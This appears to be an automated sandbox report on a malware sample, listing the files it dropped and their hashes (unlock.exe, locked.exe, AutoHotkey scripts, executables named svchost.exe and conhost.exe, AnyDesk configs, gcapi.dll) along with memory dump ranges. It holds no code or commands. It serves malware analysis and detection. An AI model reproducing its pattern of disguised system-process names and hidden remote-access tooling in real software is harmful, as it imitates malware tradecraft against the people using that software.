C:\Users\Admin\AppData\Local\Temp\30BF.tmp\30C0.tmp\30C1.bat
| MD5 | 01a143a4c96cd68edc098eec28b92605 |
| SHA1 | 28d4fb883af2cfcf2fc2690cb548c163fff98732 |
| SHA256 | 8864c3567c339c798f6a46a6dd17ae8f19a1fbac8f523838e926edc6251d79e5 |
| SHA512 | 9ca26669e31d25fd8b1302c9e5bb72e78612fe6158b5c497f8d69895bce81478f06d104d725b3de1767573209d7837d33ce489262c04380e3bda706cae3b4886 |
memory/3444-243-0x000001E2037D0000-0x000001E2037F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a1yq0u2v.vqc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Roaming\unlock.exe
| MD5 | f32796f45fbba3baaf45340c9d8d1c05 |
| SHA1 | 813dc87e3d366a255d5df01400540092cab5f62d |
| SHA256 | 62b01a0b44849da4a147e9742cbe0f39742fc522157c470157b023122aa22902 |
| SHA512 | 9a9813aabed7a6a16a5d79f2569192c53321f08e9c6868e3421d3ee7db4c139a8b124ac16b275230da16457e3ae5422423b47e3dbc2f80751891a885f6c09d84 |
C:\Users\Admin\AppData\Roaming\locked.exe
| MD5 | 6d97d6c2be27f7633da8432a5f90ccd2 |
| SHA1 | 5ffca0110e122848b772e563f74c057d7f782664 |
| SHA256 | 47b78d957e366dbf484d44bca911f41a7a795309e0d3e4c9d08fdc135efbb77a |
| SHA512 | 518e5678a7631258f2373d7f76987f668531e972e04d5bdbdf8aacb2e2a568af618b1e4f338a289edf11e419cc6b4813e95c4433e0e849243d10e10a895cbfce |
C:\Users\Admin\AppData\Roaming\doorbell2.ahk
| MD5 | d61c68849186eb9dbea169cceb79c2a6 |
| SHA1 | baca62e884a3d7dccae18ef64096db4d562def39 |
| SHA256 | 6c4daf8ef0da2cf0ac079637a5c3062a610c4c710c7e4c55eedd1b010337bb1e |
| SHA512 | deec0d4cb912d64db281459e8d01b21583fd7df3c46ea02cb66fffb5378ac6e1f375cb18f30ddccd908fc0c98d14094ea1620699f93498fc8c7be579a3a5d0b0 |
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
| MD5 | 2d0600fe2b1b3bdc45d833ca32a37fdb |
| SHA1 | e9a7411bfef54050de3b485833556f84cabd6e41 |
| SHA256 | effdea83c6b7a1dc2ce9e9d40e91dfd59bed9fcbd580903423648b7ca97d9696 |
| SHA512 | 9891cd6d2140c3a5c20d5c2d6600f3655df437b99b09ae0f9daf1983190dc73385cc87f02508997bb696ac921eee43fccdf1dc210cc602938807bdb062ce1703 |
C:\Users\Admin\AppData\Roaming\enc1.mp3
| MD5 | bbb44733d6b0bd75d6a26a9a4427705f |
| SHA1 | c29d6ec521f30efb23331648a4a7a234b2db3894 |
| SHA256 | 33b5c07a614eadb209b95b48454a10b1251809f8cc896577de5e117144b58507 |
| SHA512 | b846dce3ed1814e17b4f1a43910589e752e2ac911132d18275ff4d179796f1e7928a32636327a681d7c01edd704bec2efc8a12692597205bb334895c9063ceb3 |
C:\Users\Admin\AppData\Roaming\doorbell.ahk
| MD5 | 952ea1033b5f83c25ce5133944e4a65d |
| SHA1 | 9f50c5a2fb4aee93d154758c66d9ca81fd5fe3c5 |
| SHA256 | 163b07a09d117ff1bdeb20ed83c1ebfb0917ce72ec63d32b4b6f8f87902f604a |
| SHA512 | b500ceadee155d4f5e39348e205ce8339605732e82564545c04c9ac2a718ea7135fdc37ee8b3f60d035d26fae114022f04efd57e2cc9feb1231e18051c307785 |
C:\Users\Admin\Downloads\AnyDesk.exe
| MD5 | aee6801792d67607f228be8cec8291f9 |
| SHA1 | bf6ba727ff14ca2fddf619f292d56db9d9088066 |
| SHA256 | 1cdafbe519f60aaadb4a92e266fff709129f86f0c9ee595c45499c66092e0499 |
| SHA512 | 09d9fc8702ab6fa4fc9323c37bc970b8a7dd180293b0dbf337de726476b0b9515a4f383fa294ba084eccf0698d1e3cb5a39d0ff9ea3ba40c8a56acafce3add4f |
C:\Users\Admin\Downloads\svchost.exe
| MD5 | 1b0a49b12fb2cfc89d01cf29b8d4f875 |
| SHA1 | 2bbf873025c5c95f030de72a8a68d5d2e7b23c3b |
| SHA256 | b6ed5fdbece483fba8c67c52efbc57d77e126b032bd031f4bf68224f5c96459e |
| SHA512 | 94844cbf5c3995d3d719c5d77d1c1ab3a02269d3fbd2ef1822e301bc96441976d53b169ac982015804d28fdb1e52efc59604fed0c90bb196511f70039947fe86 |
C:\Users\Admin\Downloads\conhost.exe
| MD5 | ed4dc64d9940cae8a4ee5ee11f173899 |
| SHA1 | 39476f1d852d3fb66a4083ddfb2244ebc84d5fb0 |
| SHA256 | 49f011400451dc569c8828e8a28f74e3634e9f5bb4d3908c518c4c7d4955a18f |
| SHA512 | 5cb60f856110b7114c83805ed830a6e82e815caa8ac7cc2e07e6fc977aa5a7180a9b8d1b10df5304d5b9d063e5d39f5468a5a9c74c895c0a4c491c30292e86b1 |
C:\Users\Admin\Downloads\stn.exe
| MD5 | 8b3f80e850af1c7883f2b1df4dfebf8c |
| SHA1 | 24a528e8ffd5729faa43e3beaf3e75d85aa191e6 |
| SHA256 | 9a1760335cd16e20dda90c98e6a81a501567d016bae1b2e5f4452bfdf6ae2bae |
| SHA512 | 1168a0af7f36b168e27770f7be492201632c72f1f50bec0989e86a55254aa9f6825cbce418b4f73af8573e0e4d410638e8e1304ea78d2807a5448a0d695bd253 |
memory/4320-267-0x00000000000C0000-0x0000000001809000-memory.dmp
memory/1844-274-0x00000000000C0000-0x0000000001809000-memory.dmp
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | 7bd3c01aad7c2700e72c7abd4a2231e1 |
| SHA1 | fecf2e4e7ad01fb4f46c0756c31ca3e9aad7026c |
| SHA256 | 124930bfd6d86a2398b329b1044e8202337d83331d12c2ab7a10d1a11d326435 |
| SHA512 | 3df97663bd043feb878842bac899e57469bec33793f10c78713c93e4a5f74f87be1ec5a7a69b4ebd4966553727d2eb9cc499bb499bb6eff3c21784a8b319571f |
memory/3048-276-0x00000000000C0000-0x0000000001809000-memory.dmp
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | ace28531320aef140422ddc9d1d52727 |
| SHA1 | 5ce6eb296a5c7bf9bd7f49094f2a568d9a9cb2f4 |
| SHA256 | 8dc5e7d56b13b24dabf79cc9c96999d495cf47607b2eaa6a22666463c804c5a1 |
| SHA512 | 435b5c575704d2e0af97eeeb15ad1555e6bec3b383c3566d69b43719f212e94b818ce315edda0180c4d67e9d542686c10fc0c0fe8696541bdc4b536be1542dde |
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | 20f8980f388313882c05c0f51ced9f9c |
| SHA1 | a865ee189189e3b2cad12b1eda2b03cb5634d387 |
| SHA256 | 28a649a9b7d87d393103e6cb629da9d6696b0964edff538e818c0b0a7cdf795b |
| SHA512 | f2611cef7b65bf3db6e2bf11e1e38fb45e22d1932c0b525e611619ff20501dcc6090bfe16c03451d29f7db0dbb2afb39ac73e3a37c9e7fa6d10b59bd1e6cfaf9 |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | 3ec0ed41a108da207e7f266dff51d160 |
| SHA1 | 3ed0087917e57a2af0b78d78330a7e4941e05807 |
| SHA256 | 36768f8b2de0403eafa7b7b46d6d3642770446811cf7978576f4221c12734127 |
| SHA512 | 4a7e1a9f6a124b3902a1732e330c266799d28cc43e34a49568ea26c0ef697fba20bbc49d2a1f8168ff2e43188b18a9be8189421bb3e0db9d179ff899ce6b6166 |
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | 45a2a2c206528304448a25bffd7c288e |
| SHA1 | fdf8e9323fd7851cbc7a4834bc33f458b00ff41d |
| SHA256 | ec888ce071ab7b5159a3a8ac8505bf6d223a1f0ac74c8978c1df39fccacd74df |
| SHA512 | d23d6abc2035f5d13d2605184b177690fc161a0cd3b9d50d532a292733bc54ddec11e351a57d42595cb907e66a7aa6a0c3ccdb27c150e208f41db269d897cfd3 |
C:\Users\Admin\AppData\Roaming\AnyDesk\service.conf
| MD5 | fba8b48741ecb7ff6e7555fa8af07207 |
| SHA1 | bc56870285c3887dbe5452b56376c0582d65c0d4 |
| SHA256 | 5a18a9b71461080252502ce2192dc4732fd1e4679fd5c811d3309c22517172a3 |
| SHA512 | 6a3fe0bd3033f512a779bd1eaba244f52ea4b3fd813d571626aed281e1899aeb72fe98f73e0ef2475390b98e63131c5bba7536f586ae9fefcbd20cbee1f9f786 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 227556da5e65f6819f477756808c17e4 |
| SHA1 | 6ffce766e881ca2a60180bb25f4981b183f78279 |
| SHA256 | 101f5fe8a4192f14e9f0a12c105ca81c9f176860930af44747185dd1bedb59a4 |
| SHA512 | d46b935809d2c4b7a041ad790f2db11c0a808df022c91ae9152b8769021b884fde49653a7a46557ef9ee65e274fe0b6c8503df9b50e6b3b849fefacf51f8bd6a |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | acf4c50ce95dd519f8387b27cc2f73cd |
| SHA1 | 6f5ce0e9a6fd06ea101af732b3c3a4f37558c748 |
| SHA256 | e6a0e84acebbdd7b36466a43bd993b64632d552e0b33976ce6e8fc3cb368932d |
| SHA512 | 4ac691e39948190dc5adec78fa8b0bb2c0452007714264af42c43e880e1ebd4ff71b54f5f57659ccb760ff121d220fe20e021669fe10250d46b906691a2e02ef |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 4fa1f09e15f1771eec492d9e26533367 |
| SHA1 | 02077099e7ebbd75f802dd80d7e757caa6d3943a |
| SHA256 | dc3986ac1e5bb860c2000231781d5d56fa371f46c2a23a181c4bf2d72ece90a1 |
| SHA512 | bb0ed861c34c96efdd06bbd938cf092e131936c69554a4d52f11154cc583a410bee30fa7bb84141917d799a8335f7e5a82da3012c233c47532f0950b84c3ce01 |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | c12e1e138c781d5ff957e862c068215e |
| SHA1 | edc99c2eb643f7998ec4890c2156bcc7e4d22caa |
| SHA256 | c5264289ae83eea332be17f9017950c6725001aadf9f5b8283849a451480a2dd |
| SHA512 | 42f0a3f9e493b7ba674576ef0a9c13d3190d2f48f666e2f4f1ac8f1c1ba4f89880fd7f9beac8a088640dd990abc0c35688c8f34be645a36803d7f838d034bf49 |
memory/1844-403-0x00000000000C0000-0x0000000001809000-memory.dmp
memory/3048-404-0x00000000000C0000-0x0000000001809000-memory.dmp
memory/5412-425-0x00000000000C0000-0x0000000001809000-memory.dmp
memory/5452-430-0x0000000000AB0000-0x00000000021F9000-memory.dmp
C:\ProgramData\AnyDesk\system.conf
| MD5 | 69bec68692e724a4adc3656924a40ab7 |
| SHA1 | 1273c2133beda28c9c6b343d625a03e7834b4055 |
| SHA256 | 1ce51865192e8270ba80ceac4404ccfc4ca869f5c5c59d28b9115b30b619ae8a |
| SHA512 | 3f5eacbc5f19b90babb678e7138138883638ee65893dd54fd3b9fd27ec88adb6e906c88fc7884706750f91d7246a59fbe408546165caa3b421f58b0f9a201937 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 65be605eef6a6d064a22760ecff21b39 |
| SHA1 | bec4df917e1ae277fa7fece0339acb17984914e4 |
| SHA256 | 4c867d8703fee5c12d5b915ef134280326f619774d7a9c5a51b3fd703eeacc7b |
| SHA512 | 755cce972bb8f88422fda2f3a335b59fbb451e577e8f59dda318c479fa74a6e1f4cb82e17f724a007a18f0b11724f0f020f045d6a04dbc6df117e60ab329e2dd |
C:\ProgramData\AnyDesk\system.conf
| MD5 | d04a3ec9a5dba70049f7c844445c6191 |
| SHA1 | 127bc62e302061162ebefcb979c0cc93de71bba9 |
| SHA256 | 7f10692f2bde7168f643fcaf9f0eccd910b799436eaaf7700e9ec021b5491c1f |
| SHA512 | 340e88951183d0ea88bae5b9ea935e6c722fbe0727f85cce536aa582cc2dc753117adb733180d560397b1b23f4bf6beae6a21cf69e6e82a0207906e755cbcddc |
memory/3940-537-0x00000000000C0000-0x0000000001809000-memory.dmp
memory/4320-548-0x00000000000C0000-0x0000000001809000-memory.dmp
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | 78240107280190d04d503abab31c7245 |
| SHA1 | c8259646f2e35f1df2c2c5b4065a1d6b24f5876e |
| SHA256 | cf8fded733ef118d338429fd77869c05738d2e860e02e496d24747286fbbf0ba |
| SHA512 | 3a1756a5e95b2c070480006a156e7a93d3da8d624afa239ae8bb6bfb0edf59e49094ada10bc021d3aebd1e4b97c81a3710df1e1762fb1ebabb4b567b71d77f29 |
memory/6712-550-0x0000000000AB0000-0x00000000021F9000-memory.dmp
memory/7024-577-0x00007FFB1E360000-0x00007FFB1E394000-memory.dmp
memory/7024-581-0x00007FFB1E060000-0x00007FFB1E071000-memory.dmp
memory/7024-580-0x00007FFB1E080000-0x00007FFB1E097000-memory.dmp
memory/6712-597-0x0000000000AB0000-0x00000000021F9000-memory.dmp
memory/7024-579-0x00007FFB1F400000-0x00007FFB1F418000-memory.dmp
memory/7024-578-0x00007FFB1E0A0000-0x00007FFB1E356000-memory.dmp
memory/7024-575-0x00007FF76FA00000-0x00007FF76FAF8000-memory.dmp
memory/5584-625-0x0000000000AB0000-0x00000000021F9000-memory.dmp
memory/5584-640-0x0000000000AB0000-0x00000000021F9000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 8b4be4276d7dfddc74a9711b4fdf8940 |
| SHA1 | ff9da1017d3bb2d37b8232b0b1453fc0573eda6a |
| SHA256 | 9ec2d55ebcbee44ce56a4e7077bb6e568ca8fc5571941124b4c1e2555a84c08c |
| SHA512 | 27c97de17c027a5466cdab9e1942899e8d5f9ad157c4bf49875cacd1a4982e80909350f51ccda836e4f34f1c43993125a7537c064175b387733842f8dbcb5faf |
memory/7072-700-0x0000000000AB0000-0x00000000021F9000-memory.dmp
memory/7072-722-0x0000000000AB0000-0x00000000021F9000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | affc7bdc7d2372ec67d38457145ef0d0 |
| SHA1 | b09ac2d55e468d80b7b7f09f70482ab1f7922bb0 |
| SHA256 | db70948abe318adf3df5ee9c2eb1bad0d64fce808423422435a82ff9259e68bc |
| SHA512 | e1272ca45494e642e1918f09421b469f2eed4e7341b79d5f5f8246eb0123ab3ac31ba266fbde59e4833c5fd7215ecb391df382db490d3d0ce4795cdfe9db2e96 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000024
| MD5 | 90785397d441dd458ec8037e6483808f |
| SHA1 | 4d2a2f973969e2bf5e2de57118a0a38e05d25555 |
| SHA256 | 499ec16c540115762fb2b34b1c1a334831bff56cd229ad20814a839be3f150ae |
| SHA512 | 968411eaf912cfd98864eacc58bb635ae0984b6f589caa4e721c5e9292f719b63c674aef6c89945a1accd2565ab684af6e76fde5aed2e0edfa44d016d879ce76 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000029
| MD5 | 87e8230a9ca3f0c5ccfa56f70276e2f2 |
| SHA1 | eb116c8fd20cb2f85b7a942c7dae3b0ed6d27fe7 |
| SHA256 | e18d7214e7d3d47d913c0436f5308b9296ca3c6cd34059bf9cbf03126bafafe9 |
| SHA512 | 37690a81a9e48b157298080746aa94289a4c721c762b826329e70b41ba475bb0261d048f9ab8e7301e43305c5ebf53246c20da8cd001130bf156e8b3bd38b9b8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 2e9d451abf03ed87031551878bdd72a3 |
| SHA1 | f3a6a71280aeff1e75b3276def294c85dd596adf |
| SHA256 | 50b89abb7065c1e6a8491ee70a1de01caaf47da877ce1f2b3e0e765f4e0a131b |
| SHA512 | c06f40c4c3d98544e22f0fa37147ecfc8a348b48a85dc405d22a2eabd3f3710c04eedb47296793e5a75a0b55be90aec15090dd2f3212037496ff993406d56189 |
memory/4660-867-0x00007FFB1DFE0000-0x00007FFB1DFF1000-memory.dmp
memory/4660-858-0x00007FF76FA00000-0x00007FF76FAF8000-memory.dmp
memory/5452-857-0x0000000000AB0000-0x00000000021F9000-memory.dmp
memory/4660-879-0x00007FFB1CBF0000-0x00007FFB1CC01000-memory.dmp
memory/4660-878-0x00007FFB1DCF0000-0x00007FFB1DD01000-memory.dmp
memory/4660-877-0x00007FFB1DD10000-0x00007FFB1DD21000-memory.dmp
memory/3940-880-0x00000000000C0000-0x0000000001809000-memory.dmp
memory/4660-876-0x00007FFB1DD30000-0x00007FFB1DD48000-memory.dmp
memory/4660-868-0x0000026C5B510000-0x0000026C5C5C0000-memory.dmp
memory/4660-872-0x00007FFB1DD50000-0x00007FFB1DD71000-memory.dmp
memory/4660-871-0x00007FFB1DD80000-0x00007FFB1DDC1000-memory.dmp
memory/4660-870-0x00007FFB1DDD0000-0x00007FFB1DFDB000-memory.dmp
memory/5412-847-0x00000000000C0000-0x0000000001809000-memory.dmp
memory/4660-866-0x00007FFB1E000000-0x00007FFB1E01D000-memory.dmp
memory/4660-865-0x00007FFB1E020000-0x00007FFB1E031000-memory.dmp
memory/4660-864-0x00007FFB1E040000-0x00007FFB1E057000-memory.dmp
memory/4660-863-0x00007FFB1E060000-0x00007FFB1E071000-memory.dmp
memory/4660-862-0x00007FFB1E080000-0x00007FFB1E097000-memory.dmp
memory/4660-860-0x00007FFB1E0A0000-0x00007FFB1E356000-memory.dmp
memory/4660-861-0x00007FFB1F400000-0x00007FFB1F418000-memory.dmp
memory/4660-859-0x00007FFB1E360000-0x00007FFB1E394000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | eb8d4b02e81bdf48bc40d3bce73f9393 |
| SHA1 | 847499471afc2a50f76aa57df5f3607d746328e6 |
| SHA256 | e173d0967a2e44fc56919966dbfec0cda7eedac8b38379e0c7fc7be1be6b132d |
| SHA512 | 69f49841b0a18898ecd5c8a90b87baede7b7766df194e125776010668d36eccdbdd8b218079d7ddf34d87eb87c31e5d301e8ddbcc253755947106a2a38f5c751 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d943e18a8ac3d57b51502e50d8969980 |
| SHA1 | 2c3413b18ec0513f86db84338b87bb5d68951eda |
| SHA256 | 711ca394abef915e0c98d7ffa93dcece4ae43eb523ec8e266861ec93a58cbf5a |
| SHA512 | 90bc8840b1ba352245677f4cb3acb0a1b0cf7782a243cc7d699a67ec4430650f3f087d926499ab565f5a6ee36c9b4b3576eafab3c940c166c7d43e23b4754f2c |
C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf
| MD5 | 8a3a1b1aa26b6284eb45d535b53f6516 |
| SHA1 | 08824730b257f422688232cf0df61f8a3ce0dc1f |
| SHA256 | 6ac864e51b394044d0203b6182c5a52f8c8f4bace36f5c13262b40a7bfe9ee15 |
| SHA512 | 4f7bff00c46f0014afc3499af643b007a1b73f40d0c29d9d76c412c54d2806216c60db240b2f5333c3f28936a4e90abf3052736a18e674f07fe5a9e6a2446466 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf
| MD5 | 28adc3ef4d1a5c1258cff586b0cf0e3f |
| SHA1 | 351835099cbf9f0c3b4c4bbc19a23fab75405735 |
| SHA256 | c0dc7d9ff691c42d15ad603939058257febf96f00921fa456fb67c859e3454ff |
| SHA512 | 7d321dfc0766f9a071b6cde5de681e5ce833315008f77a0cf747c9b08c8c7fbbdaa67ca1843d5452b05d126ce1e29f0f9dc8d159bfe049fc834c66436b85d1b7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 8d2d9529e6056e93e252ea5cefd5b95c |
| SHA1 | 5a3167737dedc38661d35cd14967c0d6a835d73e |
| SHA256 | 32b663897d5ce5e9064301847fecdd1fdf41b6fd2ec4add9d06c74c6e7b7f213 |
| SHA512 | 1fefad1ae3968b25b4855a194ad78f44ceb6b60217901d94c25ccea31253880e3f2e6170e1b1cc61256cc1665003a6983105bf9e40e48a86e8c7c8e088468d11 |
C:\ProgramData\gcapi.dll
| MD5 | 1ce7d5a1566c8c449d0f6772a8c27900 |
| SHA1 | 60854185f6338e1bfc7497fd41aa44c5c00d8f85 |
| SHA256 | 73170761d6776c0debacfbbc61b6988cb8270a20174bf5c049768a264bb8ffaf |
| SHA512 | 7e3411be8614170ae91db1626c452997dc6db663d79130872a124af982ee1d457cefba00abd7f5269adce3052403be31238aecc3934c7379d224cb792d519753 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 7e96449902f0833e4c349260da780b91 |
| SHA1 | 561cfdce8ae2d13f0de9157eb4f2b37e3077e4bc |
| SHA256 | ae28df2d1d4456f6a5127a42cdff8d6b0d436bfea67574e382b9e90b50a66d11 |
| SHA512 | c3057ce95cb5d539445b5d17ef54f759317ab7666452229ce6506930ede43adee202f693f8328b18af4d962b73d3ab422bad9ebf0336a91c0780af0be576411b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 6e8dc578d33e4e5755dbf990787eb85d |
| SHA1 | cb9fdedcb5adf2dd42dbd10e8faad6d184697d04 |
| SHA256 | 3e167f04413028cf244a18f161ee1cca3fd453370f4c660ff62954ab7a135d89 |
| SHA512 | 89bcef2fe78bddccc3eaac677a91e6df191ad4d68634ef1a76eea29bf1b845667754f75b2b7c6496c925b3042b9322b9896d2c3694cffe5edeb1225d5f663c2b |
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | 3dd79df58d257ccb173429ba38efe23d |
| SHA1 | 2cec6dbb0a0501e31ba2d0ed2d1d35f87a0eca00 |
| SHA256 | 2363422dd749d4974882ca8b883e6d1b5989af278e572897edd180407dda9fa8 |
| SHA512 | 88db00289c405cc4c5eff19e068b93b331e648820ed6593ef634c1c3d2967b103859150a0961e8e50a6e2179b7c210e7d0a4672f7fc22033f53a7207752e11c5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | f656418acad6993796928d0d261195f1 |
| SHA1 | 20026ffd5e169caa48160ba31cf3b68267975f0e |
| SHA256 | f510d474c2e4718bdd3979066a6a032947dfcd71c330f2ed1b848dbbb0b69c2b |
| SHA512 | 468e40ad8031bbffc982121059fb71e9cef75d925587b7e28e434bd08bfa6dd4729b48d60c122f7cbde85c296743cee497d523c68f25336a0f38487828938e94 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | c75706c9386643fbb7b40f2cc0e7367d |
| SHA1 | 7215fb0957d1dfe3d51b40079faa92383bbbf39c |
| SHA256 | 6c32f821cb9b16b8462f100b94d3b973c7927e8d61237ae75fbc25ca948d69b9 |
| SHA512 | 79c07a8d0fcbebdb3f080ad6c1bce3b40b3dbace2c52f5983afc680431cec58ec16be0faedaf2ee4c95ccb69c394eb1508782075728b92f5df9d0850053e2a80 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | c49abdbf8a6c583e2d6b8a4ac476497d |
| SHA1 | 149c84b34c04dbfe9259a41f3605dc42e07554b7 |
| SHA256 | 461b1b044723739f8c0543dcbd98f51887caf47e2cb7a04fc97797b944492b74 |
| SHA512 | 75ba1ccd47dcf066182ff8057a959bb5a8a1db220d344f9f5ac1226187dc43f7ec80d4a39d0d26568265257f6e073e9c3922d463ebafa8072aa0e574265de5e8 |